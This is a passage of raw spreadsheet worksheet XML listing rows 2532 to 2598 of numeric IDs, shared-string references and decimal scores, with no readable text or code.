        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="2532" ht="15.75" customHeight="1">
      <c r="A2532" s="1">
        <v>28313.0</v>
      </c>
      <c r="B2532" s="2">
        <v>2.5694587E7</v>
      </c>
      <c r="C2532" s="2" t="s">
        <v>2344</v>
      </c>
      <c r="D2532" s="2">
        <v>1.0</v>
      </c>
      <c r="E2532" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2532" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="2533" ht="15.75" customHeight="1">
      <c r="A2533" s="1">
        <v>17799.0</v>
      </c>
      <c r="B2533" s="2">
        <v>5.0803686E7</v>
      </c>
      <c r="C2533" s="2" t="s">
        <v>2345</v>
      </c>
      <c r="D2533" s="2">
        <v>1.0</v>
      </c>
      <c r="E2533" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2533" s="2">
        <v>0.09424603174603172</v>
      </c>
    </row>
    <row r="2534" ht="15.75" customHeight="1">
      <c r="A2534" s="1">
        <v>6828.0</v>
      </c>
      <c r="B2534" s="2">
        <v>4.9594809E7</v>
      </c>
      <c r="C2534" s="2" t="s">
        <v>2346</v>
      </c>
      <c r="D2534" s="2">
        <v>1.0</v>
      </c>
      <c r="E2534" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2534" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="2535" ht="15.75" customHeight="1">
      <c r="A2535" s="1">
        <v>7999.0</v>
      </c>
      <c r="B2535" s="2">
        <v>5.2777186E7</v>
      </c>
      <c r="C2535" s="2" t="s">
        <v>2347</v>
      </c>
      <c r="D2535" s="2">
        <v>1.0</v>
      </c>
      <c r="E2535" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2535" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="2536" ht="15.75" customHeight="1">
      <c r="A2536" s="1">
        <v>32541.0</v>
      </c>
      <c r="B2536" s="2">
        <v>5.7463356E7</v>
      </c>
      <c r="C2536" s="2" t="s">
        <v>2348</v>
      </c>
      <c r="D2536" s="2">
        <v>1.0</v>
      </c>
      <c r="E2536" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2536" s="2">
        <v>0.09393939393939395</v>
      </c>
    </row>
    <row r="2537" ht="15.75" customHeight="1">
      <c r="A2537" s="1">
        <v>10852.0</v>
      </c>
      <c r="B2537" s="2">
        <v>1.619992E7</v>
      </c>
      <c r="C2537" s="2" t="s">
        <v>2349</v>
      </c>
      <c r="D2537" s="2">
        <v>1.0</v>
      </c>
      <c r="E2537" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2537" s="2">
        <v>0.09294871794871794</v>
      </c>
    </row>
    <row r="2538" ht="15.75" customHeight="1">
      <c r="A2538" s="1">
        <v>23085.0</v>
      </c>
      <c r="B2538" s="2">
        <v>5064658.0</v>
      </c>
      <c r="C2538" s="2" t="s">
        <v>2350</v>
      </c>
      <c r="D2538" s="2">
        <v>1.0</v>
      </c>
      <c r="E2538" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2538" s="2">
        <v>0.09259259259259259</v>
      </c>
    </row>
    <row r="2539" ht="15.75" customHeight="1">
      <c r="A2539" s="1">
        <v>3893.0</v>
      </c>
      <c r="B2539" s="2">
        <v>4.0414021E7</v>
      </c>
      <c r="C2539" s="2" t="s">
        <v>2351</v>
      </c>
      <c r="D2539" s="2">
        <v>1.0</v>
      </c>
      <c r="E2539" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2539" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="2540" ht="15.75" customHeight="1">
      <c r="A2540" s="1">
        <v>5874.0</v>
      </c>
      <c r="B2540" s="2">
        <v>4.7029909E7</v>
      </c>
      <c r="C2540" s="2" t="s">
        <v>2352</v>
      </c>
      <c r="D2540" s="2">
        <v>1.0</v>
      </c>
      <c r="E2540" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2540" s="2">
        <v>0.5859375</v>
      </c>
    </row>
    <row r="2541" ht="15.75" customHeight="1">
      <c r="A2541" s="1">
        <v>6657.0</v>
      </c>
      <c r="B2541" s="2">
        <v>4.9099091E7</v>
      </c>
      <c r="C2541" s="2" t="s">
        <v>2354</v>
      </c>
      <c r="D2541" s="2">
        <v>1.0</v>
      </c>
      <c r="E2541" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2541" s="2">
        <v>0.4471677559912854</v>
      </c>
    </row>
    <row r="2542" ht="15.75" customHeight="1">
      <c r="A2542" s="1">
        <v>9119.0</v>
      </c>
      <c r="B2542" s="2">
        <v>5.5216112E7</v>
      </c>
      <c r="C2542" s="2" t="s">
        <v>2355</v>
      </c>
      <c r="D2542" s="2">
        <v>1.0</v>
      </c>
      <c r="E2542" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2542" s="2">
        <v>0.4223416965352449</v>
      </c>
    </row>
    <row r="2543" ht="15.75" customHeight="1">
      <c r="A2543" s="1">
        <v>10202.0</v>
      </c>
      <c r="B2543" s="2">
        <v>5.7403028E7</v>
      </c>
      <c r="C2543" s="2" t="s">
        <v>2356</v>
      </c>
      <c r="D2543" s="2">
        <v>1.0</v>
      </c>
      <c r="E2543" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2543" s="2">
        <v>0.4194139194139194</v>
      </c>
    </row>
    <row r="2544" ht="15.75" customHeight="1">
      <c r="A2544" s="1">
        <v>9904.0</v>
      </c>
      <c r="B2544" s="2">
        <v>5.6776547E7</v>
      </c>
      <c r="C2544" s="2" t="s">
        <v>2357</v>
      </c>
      <c r="D2544" s="2">
        <v>1.0</v>
      </c>
      <c r="E2544" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2544" s="2">
        <v>0.3900900900900901</v>
      </c>
    </row>
    <row r="2545" ht="15.75" customHeight="1">
      <c r="A2545" s="1">
        <v>9300.0</v>
      </c>
      <c r="B2545" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2545" s="2" t="s">
        <v>2358</v>
      </c>
      <c r="D2545" s="2">
        <v>1.0</v>
      </c>
      <c r="E2545" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2545" s="2">
        <v>0.3742368742368742</v>
      </c>
    </row>
    <row r="2546" ht="15.75" customHeight="1">
      <c r="A2546" s="1">
        <v>4616.0</v>
      </c>
      <c r="B2546" s="2">
        <v>4.2936838E7</v>
      </c>
      <c r="C2546" s="2" t="s">
        <v>2359</v>
      </c>
      <c r="D2546" s="2">
        <v>1.0</v>
      </c>
      <c r="E2546" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2546" s="2">
        <v>0.3738888888888888</v>
      </c>
    </row>
    <row r="2547" ht="15.75" customHeight="1">
      <c r="A2547" s="1">
        <v>2576.0</v>
      </c>
      <c r="B2547" s="2">
        <v>3.4274774E7</v>
      </c>
      <c r="C2547" s="2" t="s">
        <v>2360</v>
      </c>
      <c r="D2547" s="2">
        <v>1.0</v>
      </c>
      <c r="E2547" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2547" s="2">
        <v>0.3714596949891068</v>
      </c>
    </row>
    <row r="2548" ht="15.75" customHeight="1">
      <c r="A2548" s="1">
        <v>4598.0</v>
      </c>
      <c r="B2548" s="2">
        <v>4.2809821E7</v>
      </c>
      <c r="C2548" s="2" t="s">
        <v>2361</v>
      </c>
      <c r="D2548" s="2">
        <v>1.0</v>
      </c>
      <c r="E2548" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2548" s="2">
        <v>0.3665311653116531</v>
      </c>
    </row>
    <row r="2549" ht="15.75" customHeight="1">
      <c r="A2549" s="1">
        <v>9470.0</v>
      </c>
      <c r="B2549" s="2">
        <v>5.5862646E7</v>
      </c>
      <c r="C2549" s="2" t="s">
        <v>2362</v>
      </c>
      <c r="D2549" s="2">
        <v>1.0</v>
      </c>
      <c r="E2549" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2549" s="2">
        <v>0.3621553884711779</v>
      </c>
    </row>
    <row r="2550" ht="15.75" customHeight="1">
      <c r="A2550" s="1">
        <v>8673.0</v>
      </c>
      <c r="B2550" s="2">
        <v>5.4380953E7</v>
      </c>
      <c r="C2550" s="2" t="s">
        <v>2363</v>
      </c>
      <c r="D2550" s="2">
        <v>1.0</v>
      </c>
      <c r="E2550" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2550" s="2">
        <v>0.3424145299145299</v>
      </c>
    </row>
    <row r="2551" ht="15.75" customHeight="1">
      <c r="A2551" s="1">
        <v>6875.0</v>
      </c>
      <c r="B2551" s="2">
        <v>4.9704566E7</v>
      </c>
      <c r="C2551" s="2" t="s">
        <v>2364</v>
      </c>
      <c r="D2551" s="2">
        <v>1.0</v>
      </c>
      <c r="E2551" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2551" s="2">
        <v>0.3391472868217054</v>
      </c>
    </row>
    <row r="2552" ht="15.75" customHeight="1">
      <c r="A2552" s="1">
        <v>1359.0</v>
      </c>
      <c r="B2552" s="2">
        <v>2.5970903E7</v>
      </c>
      <c r="C2552" s="2" t="s">
        <v>2365</v>
      </c>
      <c r="D2552" s="2">
        <v>1.0</v>
      </c>
      <c r="E2552" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2552" s="2">
        <v>0.3289141414141414</v>
      </c>
    </row>
    <row r="2553" ht="15.75" customHeight="1">
      <c r="A2553" s="1">
        <v>2779.0</v>
      </c>
      <c r="B2553" s="2">
        <v>3.5185655E7</v>
      </c>
      <c r="C2553" s="2" t="s">
        <v>2366</v>
      </c>
      <c r="D2553" s="2">
        <v>1.0</v>
      </c>
      <c r="E2553" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2553" s="2">
        <v>0.3127394636015325</v>
      </c>
    </row>
    <row r="2554" ht="15.75" customHeight="1">
      <c r="A2554" s="1">
        <v>9779.0</v>
      </c>
      <c r="B2554" s="2">
        <v>5.6515114E7</v>
      </c>
      <c r="C2554" s="2" t="s">
        <v>2367</v>
      </c>
      <c r="D2554" s="2">
        <v>1.0</v>
      </c>
      <c r="E2554" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2554" s="2">
        <v>0.3114316239316239</v>
      </c>
    </row>
    <row r="2555" ht="15.75" customHeight="1">
      <c r="A2555" s="1">
        <v>6717.0</v>
      </c>
      <c r="B2555" s="2">
        <v>4.9277943E7</v>
      </c>
      <c r="C2555" s="2" t="s">
        <v>2368</v>
      </c>
      <c r="D2555" s="2">
        <v>1.0</v>
      </c>
      <c r="E2555" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2555" s="2">
        <v>0.3077485380116959</v>
      </c>
    </row>
    <row r="2556" ht="15.75" customHeight="1">
      <c r="A2556" s="1">
        <v>5134.0</v>
      </c>
      <c r="B2556" s="2">
        <v>4.4623925E7</v>
      </c>
      <c r="C2556" s="2" t="s">
        <v>2369</v>
      </c>
      <c r="D2556" s="2">
        <v>1.0</v>
      </c>
      <c r="E2556" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2556" s="2">
        <v>0.3018518518518519</v>
      </c>
    </row>
    <row r="2557" ht="15.75" customHeight="1">
      <c r="A2557" s="1">
        <v>4283.0</v>
      </c>
      <c r="B2557" s="2">
        <v>4.1890424E7</v>
      </c>
      <c r="C2557" s="2" t="s">
        <v>2370</v>
      </c>
      <c r="D2557" s="2">
        <v>1.0</v>
      </c>
      <c r="E2557" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2557" s="2">
        <v>0.3018327605956472</v>
      </c>
    </row>
    <row r="2558" ht="15.75" customHeight="1">
      <c r="A2558" s="1">
        <v>9964.0</v>
      </c>
      <c r="B2558" s="2">
        <v>5.6929233E7</v>
      </c>
      <c r="C2558" s="2" t="s">
        <v>2371</v>
      </c>
      <c r="D2558" s="2">
        <v>1.0</v>
      </c>
      <c r="E2558" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2558" s="2">
        <v>0.2945041816009558</v>
      </c>
    </row>
    <row r="2559" ht="15.75" customHeight="1">
      <c r="A2559" s="1">
        <v>3898.0</v>
      </c>
      <c r="B2559" s="2">
        <v>4.045432E7</v>
      </c>
      <c r="C2559" s="2" t="s">
        <v>2372</v>
      </c>
      <c r="D2559" s="2">
        <v>1.0</v>
      </c>
      <c r="E2559" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2559" s="2">
        <v>0.2938144329896907</v>
      </c>
    </row>
    <row r="2560" ht="15.75" customHeight="1">
      <c r="A2560" s="1">
        <v>2182.0</v>
      </c>
      <c r="B2560" s="2">
        <v>3.1842192E7</v>
      </c>
      <c r="C2560" s="2" t="s">
        <v>2373</v>
      </c>
      <c r="D2560" s="2">
        <v>1.0</v>
      </c>
      <c r="E2560" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2560" s="2">
        <v>0.2931286549707602</v>
      </c>
    </row>
    <row r="2561" ht="15.75" customHeight="1">
      <c r="A2561" s="1">
        <v>3594.0</v>
      </c>
      <c r="B2561" s="2">
        <v>3.9064193E7</v>
      </c>
      <c r="C2561" s="2" t="s">
        <v>2374</v>
      </c>
      <c r="D2561" s="2">
        <v>1.0</v>
      </c>
      <c r="E2561" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2561" s="2">
        <v>0.2860360360360361</v>
      </c>
    </row>
    <row r="2562" ht="15.75" customHeight="1">
      <c r="A2562" s="1">
        <v>2583.0</v>
      </c>
      <c r="B2562" s="2">
        <v>3.4322126E7</v>
      </c>
      <c r="C2562" s="2" t="s">
        <v>2375</v>
      </c>
      <c r="D2562" s="2">
        <v>1.0</v>
      </c>
      <c r="E2562" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2562" s="2">
        <v>0.2849206349206349</v>
      </c>
    </row>
    <row r="2563" ht="15.75" customHeight="1">
      <c r="A2563" s="1">
        <v>7230.0</v>
      </c>
      <c r="B2563" s="2">
        <v>5.0665022E7</v>
      </c>
      <c r="C2563" s="2" t="s">
        <v>2376</v>
      </c>
      <c r="D2563" s="2">
        <v>1.0</v>
      </c>
      <c r="E2563" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2563" s="2">
        <v>0.2847222222222222</v>
      </c>
    </row>
    <row r="2564" ht="15.75" customHeight="1">
      <c r="A2564" s="1">
        <v>453.0</v>
      </c>
      <c r="B2564" s="2">
        <v>1.7216264E7</v>
      </c>
      <c r="C2564" s="2" t="s">
        <v>2377</v>
      </c>
      <c r="D2564" s="2">
        <v>1.0</v>
      </c>
      <c r="E2564" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2564" s="2">
        <v>0.2842261904761904</v>
      </c>
    </row>
    <row r="2565" ht="15.75" customHeight="1">
      <c r="A2565" s="1">
        <v>1623.0</v>
      </c>
      <c r="B2565" s="2">
        <v>2.7910367E7</v>
      </c>
      <c r="C2565" s="2" t="s">
        <v>2378</v>
      </c>
      <c r="D2565" s="2">
        <v>1.0</v>
      </c>
      <c r="E2565" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2565" s="2">
        <v>0.2820767195767195</v>
      </c>
    </row>
    <row r="2566" ht="15.75" customHeight="1">
      <c r="A2566" s="1">
        <v>3339.0</v>
      </c>
      <c r="B2566" s="2">
        <v>3.7711762E7</v>
      </c>
      <c r="C2566" s="2" t="s">
        <v>2379</v>
      </c>
      <c r="D2566" s="2">
        <v>1.0</v>
      </c>
      <c r="E2566" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2566" s="2">
        <v>0.2799479166666667</v>
      </c>
    </row>
    <row r="2567" ht="15.75" customHeight="1">
      <c r="A2567" s="1">
        <v>4281.0</v>
      </c>
      <c r="B2567" s="2">
        <v>4.1890424E7</v>
      </c>
      <c r="C2567" s="2" t="s">
        <v>2380</v>
      </c>
      <c r="D2567" s="2">
        <v>1.0</v>
      </c>
      <c r="E2567" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2567" s="2">
        <v>0.2777777777777778</v>
      </c>
    </row>
    <row r="2568" ht="15.75" customHeight="1">
      <c r="A2568" s="1">
        <v>13872.0</v>
      </c>
      <c r="B2568" s="2">
        <v>3.6959935E7</v>
      </c>
      <c r="C2568" s="2" t="s">
        <v>2381</v>
      </c>
      <c r="D2568" s="2">
        <v>1.0</v>
      </c>
      <c r="E2568" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2568" s="2">
        <v>0.2735690235690236</v>
      </c>
    </row>
    <row r="2569" ht="15.75" customHeight="1">
      <c r="A2569" s="1">
        <v>8416.0</v>
      </c>
      <c r="B2569" s="2">
        <v>5.3917358E7</v>
      </c>
      <c r="C2569" s="2" t="s">
        <v>2382</v>
      </c>
      <c r="D2569" s="2">
        <v>1.0</v>
      </c>
      <c r="E2569" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2569" s="2">
        <v>0.2720057720057721</v>
      </c>
    </row>
    <row r="2570" ht="15.75" customHeight="1">
      <c r="A2570" s="1">
        <v>5313.0</v>
      </c>
      <c r="B2570" s="2">
        <v>4.527807E7</v>
      </c>
      <c r="C2570" s="2" t="s">
        <v>2383</v>
      </c>
      <c r="D2570" s="2">
        <v>1.0</v>
      </c>
      <c r="E2570" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2570" s="2">
        <v>0.269485903814262</v>
      </c>
    </row>
    <row r="2571" ht="15.75" customHeight="1">
      <c r="A2571" s="1">
        <v>2338.0</v>
      </c>
      <c r="B2571" s="2">
        <v>3.2970614E7</v>
      </c>
      <c r="C2571" s="2" t="s">
        <v>2384</v>
      </c>
      <c r="D2571" s="2">
        <v>1.0</v>
      </c>
      <c r="E2571" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2571" s="2">
        <v>0.2646604938271606</v>
      </c>
    </row>
    <row r="2572" ht="15.75" customHeight="1">
      <c r="A2572" s="1">
        <v>4282.0</v>
      </c>
      <c r="B2572" s="2">
        <v>4.1890424E7</v>
      </c>
      <c r="C2572" s="2" t="s">
        <v>2385</v>
      </c>
      <c r="D2572" s="2">
        <v>1.0</v>
      </c>
      <c r="E2572" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2572" s="2">
        <v>0.2640845070422535</v>
      </c>
    </row>
    <row r="2573" ht="15.75" customHeight="1">
      <c r="A2573" s="1">
        <v>10152.0</v>
      </c>
      <c r="B2573" s="2">
        <v>5.7314341E7</v>
      </c>
      <c r="C2573" s="2" t="s">
        <v>2386</v>
      </c>
      <c r="D2573" s="2">
        <v>1.0</v>
      </c>
      <c r="E2573" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2573" s="2">
        <v>0.2616747181964573</v>
      </c>
    </row>
    <row r="2574" ht="15.75" customHeight="1">
      <c r="A2574" s="1">
        <v>8197.0</v>
      </c>
      <c r="B2574" s="2">
        <v>5.3264373E7</v>
      </c>
      <c r="C2574" s="2" t="s">
        <v>2387</v>
      </c>
      <c r="D2574" s="2">
        <v>1.0</v>
      </c>
      <c r="E2574" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2574" s="2">
        <v>0.2613960113960114</v>
      </c>
    </row>
    <row r="2575" ht="15.75" customHeight="1">
      <c r="A2575" s="1">
        <v>9555.0</v>
      </c>
      <c r="B2575" s="2">
        <v>5.6040429E7</v>
      </c>
      <c r="C2575" s="2" t="s">
        <v>2388</v>
      </c>
      <c r="D2575" s="2">
        <v>1.0</v>
      </c>
      <c r="E2575" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2575" s="2">
        <v>0.258998435054773</v>
      </c>
    </row>
    <row r="2576" ht="15.75" customHeight="1">
      <c r="A2576" s="1">
        <v>4280.0</v>
      </c>
      <c r="B2576" s="2">
        <v>4.1890424E7</v>
      </c>
      <c r="C2576" s="2" t="s">
        <v>2389</v>
      </c>
      <c r="D2576" s="2">
        <v>1.0</v>
      </c>
      <c r="E2576" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2576" s="2">
        <v>0.2570422535211268</v>
      </c>
    </row>
    <row r="2577" ht="15.75" customHeight="1">
      <c r="A2577" s="1">
        <v>7852.0</v>
      </c>
      <c r="B2577" s="2">
        <v>5.2344777E7</v>
      </c>
      <c r="C2577" s="2" t="s">
        <v>2390</v>
      </c>
      <c r="D2577" s="2">
        <v>1.0</v>
      </c>
      <c r="E2577" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2577" s="2">
        <v>0.2555555555555555</v>
      </c>
    </row>
    <row r="2578" ht="15.75" customHeight="1">
      <c r="A2578" s="1">
        <v>10290.0</v>
      </c>
      <c r="B2578" s="2">
        <v>5.7642422E7</v>
      </c>
      <c r="C2578" s="2" t="s">
        <v>2391</v>
      </c>
      <c r="D2578" s="2">
        <v>1.0</v>
      </c>
      <c r="E2578" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2578" s="2">
        <v>0.2548500881834216</v>
      </c>
    </row>
    <row r="2579" ht="15.75" customHeight="1">
      <c r="A2579" s="1">
        <v>724.0</v>
      </c>
      <c r="B2579" s="2">
        <v>2.0755142E7</v>
      </c>
      <c r="C2579" s="2" t="s">
        <v>2392</v>
      </c>
      <c r="D2579" s="2">
        <v>1.0</v>
      </c>
      <c r="E2579" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2579" s="2">
        <v>0.2540453074433657</v>
      </c>
    </row>
    <row r="2580" ht="15.75" customHeight="1">
      <c r="A2580" s="1">
        <v>6242.0</v>
      </c>
      <c r="B2580" s="2">
        <v>4.8083904E7</v>
      </c>
      <c r="C2580" s="2" t="s">
        <v>2393</v>
      </c>
      <c r="D2580" s="2">
        <v>1.0</v>
      </c>
      <c r="E2580" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2580" s="2">
        <v>0.2515605493133583</v>
      </c>
    </row>
    <row r="2581" ht="15.75" customHeight="1">
      <c r="A2581" s="1">
        <v>13866.0</v>
      </c>
      <c r="B2581" s="2">
        <v>3.6945432E7</v>
      </c>
      <c r="C2581" s="2" t="s">
        <v>2394</v>
      </c>
      <c r="D2581" s="2">
        <v>1.0</v>
      </c>
      <c r="E2581" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2581" s="2">
        <v>0.2508169934640523</v>
      </c>
    </row>
    <row r="2582" ht="15.75" customHeight="1">
      <c r="A2582" s="1">
        <v>5022.0</v>
      </c>
      <c r="B2582" s="2">
        <v>4.4223563E7</v>
      </c>
      <c r="C2582" s="2" t="s">
        <v>2395</v>
      </c>
      <c r="D2582" s="2">
        <v>1.0</v>
      </c>
      <c r="E2582" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2582" s="2">
        <v>0.2496296296296296</v>
      </c>
    </row>
    <row r="2583" ht="15.75" customHeight="1">
      <c r="A2583" s="1">
        <v>9477.0</v>
      </c>
      <c r="B2583" s="2">
        <v>5.5869817E7</v>
      </c>
      <c r="C2583" s="2" t="s">
        <v>2396</v>
      </c>
      <c r="D2583" s="2">
        <v>1.0</v>
      </c>
      <c r="E2583" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2583" s="2">
        <v>0.2487654320987654</v>
      </c>
    </row>
    <row r="2584" ht="15.75" customHeight="1">
      <c r="A2584" s="1">
        <v>3649.0</v>
      </c>
      <c r="B2584" s="2">
        <v>3.9294609E7</v>
      </c>
      <c r="C2584" s="2" t="s">
        <v>2397</v>
      </c>
      <c r="D2584" s="2">
        <v>1.0</v>
      </c>
      <c r="E2584" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2584" s="2">
        <v>0.2486449864498645</v>
      </c>
    </row>
    <row r="2585" ht="15.75" customHeight="1">
      <c r="A2585" s="1">
        <v>8835.0</v>
      </c>
      <c r="B2585" s="2">
        <v>5.4658105E7</v>
      </c>
      <c r="C2585" s="2" t="s">
        <v>2398</v>
      </c>
      <c r="D2585" s="2">
        <v>1.0</v>
      </c>
      <c r="E2585" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2585" s="2">
        <v>0.2468253968253968</v>
      </c>
    </row>
    <row r="2586" ht="15.75" customHeight="1">
      <c r="A2586" s="1">
        <v>4562.0</v>
      </c>
      <c r="B2586" s="2">
        <v>4.2716853E7</v>
      </c>
      <c r="C2586" s="2" t="s">
        <v>2399</v>
      </c>
      <c r="D2586" s="2">
        <v>1.0</v>
      </c>
      <c r="E2586" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2586" s="2">
        <v>0.2437037037037037</v>
      </c>
    </row>
    <row r="2587" ht="15.75" customHeight="1">
      <c r="A2587" s="1">
        <v>5252.0</v>
      </c>
      <c r="B2587" s="2">
        <v>4.5094431E7</v>
      </c>
      <c r="C2587" s="2" t="s">
        <v>2400</v>
      </c>
      <c r="D2587" s="2">
        <v>1.0</v>
      </c>
      <c r="E2587" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2587" s="2">
        <v>0.2425742574257425</v>
      </c>
    </row>
    <row r="2588" ht="15.75" customHeight="1">
      <c r="A2588" s="1">
        <v>9303.0</v>
      </c>
      <c r="B2588" s="2">
        <v>5.5561129E7</v>
      </c>
      <c r="C2588" s="2" t="s">
        <v>2401</v>
      </c>
      <c r="D2588" s="2">
        <v>1.0</v>
      </c>
      <c r="E2588" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2588" s="2">
        <v>0.2391304347826086</v>
      </c>
    </row>
    <row r="2589" ht="15.75" customHeight="1">
      <c r="A2589" s="1">
        <v>1227.0</v>
      </c>
      <c r="B2589" s="2">
        <v>2.4966878E7</v>
      </c>
      <c r="C2589" s="2" t="s">
        <v>2402</v>
      </c>
      <c r="D2589" s="2">
        <v>1.0</v>
      </c>
      <c r="E2589" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2589" s="2">
        <v>0.2362962962962963</v>
      </c>
    </row>
    <row r="2590" ht="15.75" customHeight="1">
      <c r="A2590" s="1">
        <v>6552.0</v>
      </c>
      <c r="B2590" s="2">
        <v>4.8859E7</v>
      </c>
      <c r="C2590" s="2" t="s">
        <v>2403</v>
      </c>
      <c r="D2590" s="2">
        <v>1.0</v>
      </c>
      <c r="E2590" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2590" s="2">
        <v>0.2335069444444445</v>
      </c>
    </row>
    <row r="2591" ht="15.75" customHeight="1">
      <c r="A2591" s="1">
        <v>5882.0</v>
      </c>
      <c r="B2591" s="2">
        <v>4.7073493E7</v>
      </c>
      <c r="C2591" s="2" t="s">
        <v>2404</v>
      </c>
      <c r="D2591" s="2">
        <v>1.0</v>
      </c>
      <c r="E2591" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2591" s="2">
        <v>0.232843137254902</v>
      </c>
    </row>
    <row r="2592" ht="15.75" customHeight="1">
      <c r="A2592" s="1">
        <v>7551.0</v>
      </c>
      <c r="B2592" s="2">
        <v>5.152507E7</v>
      </c>
      <c r="C2592" s="2" t="s">
        <v>2405</v>
      </c>
      <c r="D2592" s="2">
        <v>1.0</v>
      </c>
      <c r="E2592" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2592" s="2">
        <v>0.2319223985890653</v>
      </c>
    </row>
    <row r="2593" ht="15.75" customHeight="1">
      <c r="A2593" s="1">
        <v>12967.0</v>
      </c>
      <c r="B2593" s="2">
        <v>3.2528498E7</v>
      </c>
      <c r="C2593" s="2" t="s">
        <v>2406</v>
      </c>
      <c r="D2593" s="2">
        <v>1.0</v>
      </c>
      <c r="E2593" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2593" s="2">
        <v>0.2297979797979798</v>
      </c>
    </row>
    <row r="2594" ht="15.75" customHeight="1">
      <c r="A2594" s="1">
        <v>31807.0</v>
      </c>
      <c r="B2594" s="2">
        <v>5245934.0</v>
      </c>
      <c r="C2594" s="2" t="s">
        <v>2407</v>
      </c>
      <c r="D2594" s="2">
        <v>1.0</v>
      </c>
      <c r="E2594" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2594" s="2">
        <v>0.2297178130511464</v>
      </c>
    </row>
    <row r="2595" ht="15.75" customHeight="1">
      <c r="A2595" s="1">
        <v>1201.0</v>
      </c>
      <c r="B2595" s="2">
        <v>2.4789371E7</v>
      </c>
      <c r="C2595" s="2" t="s">
        <v>2408</v>
      </c>
      <c r="D2595" s="2">
        <v>1.0</v>
      </c>
      <c r="E2595" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2595" s="2">
        <v>0.228494623655914</v>
      </c>
    </row>
    <row r="2596" ht="15.75" customHeight="1">
      <c r="A2596" s="1">
        <v>9782.0</v>
      </c>
      <c r="B2596" s="2">
        <v>5.6517352E7</v>
      </c>
      <c r="C2596" s="2" t="s">
        <v>2409</v>
      </c>
      <c r="D2596" s="2">
        <v>1.0</v>
      </c>
      <c r="E2596" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2596" s="2">
        <v>0.2273391812865497</v>
      </c>
    </row>
    <row r="2597" ht="15.75" customHeight="1">
      <c r="A2597" s="1">
        <v>1200.0</v>
      </c>
      <c r="B2597" s="2">
        <v>2.4787469E7</v>
      </c>
      <c r="C2597" s="2" t="s">
        <v>2408</v>
      </c>
      <c r="D2597" s="2">
        <v>1.0</v>
      </c>
      <c r="E2597" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2597" s="2">
        <v>0.224910394265233</v>
      </c>
    </row>
    <row r="2598" ht="15.75" customHeight="1">
      <c r="A2598" s="1">
        <v>9979.0</v>
      </c>
      <c r="B2598" s="2">
        <v>5.6948231E7</v>
      </c>
      <c r="C2598" s="2" t="s">
        <v>2410</v>
      </c>
      <c r="D2598" s="2">
        <v>1.0</v>
      </c>
      <c r="E2598" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2598" s="2">
        <v>0.2230392156862746</v>
